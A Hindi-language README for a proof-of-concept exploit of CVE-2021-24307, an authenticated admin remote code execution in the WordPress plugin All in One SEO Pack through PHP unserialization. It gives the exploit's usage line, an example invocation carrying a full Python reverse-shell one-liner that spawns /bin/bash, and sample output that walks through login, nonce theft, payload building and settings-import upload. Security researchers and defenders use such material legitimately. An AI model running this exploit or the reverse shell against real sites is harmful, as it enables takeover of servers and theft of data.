
CVE-2021-24307 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, All in One SEO Pack <= 4.1.0.1 में PHP unserialization के माध्यम से एक प्रमाणित एडमिन RCE, जो मनमाना कमांड निष्पादन सक्षम करता है।
AISEO <= 4.1.0.1 में प्रमाणित एडमिन RCE का सरल PoC, उदाहरण के रूप में प्रदान किया गया।
पूरा लेख यहाँ पढ़ें: https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/
उपयोग:
php exploit.php url login password php_command arguments [proxy]
उदाहरण:
└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080
-- All-in-one-seo-pack <= 4.1.0.1 authenticated admin RCE --
-- Exploit by Vincent MICHEL (@darkpills) --
[+] wordpress http://wordpress/ पर प्रमाणीकरण हो रहा है
[+] WP REST API nonce प्राप्त किया जा रहा है
[+] Nonce मिला: 6aeb9ddf05
[+] कमांड निष्पादित करने के लिए POST payload बनाया जा रहा है: shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'")
[+] सेटिंग्स आयात के साथ ini फ़ाइल अपलोड की जा रही है
[+] हो गया! परिणाम कहीं और जाँचें (ब्लाइंड कमांड निष्पादन)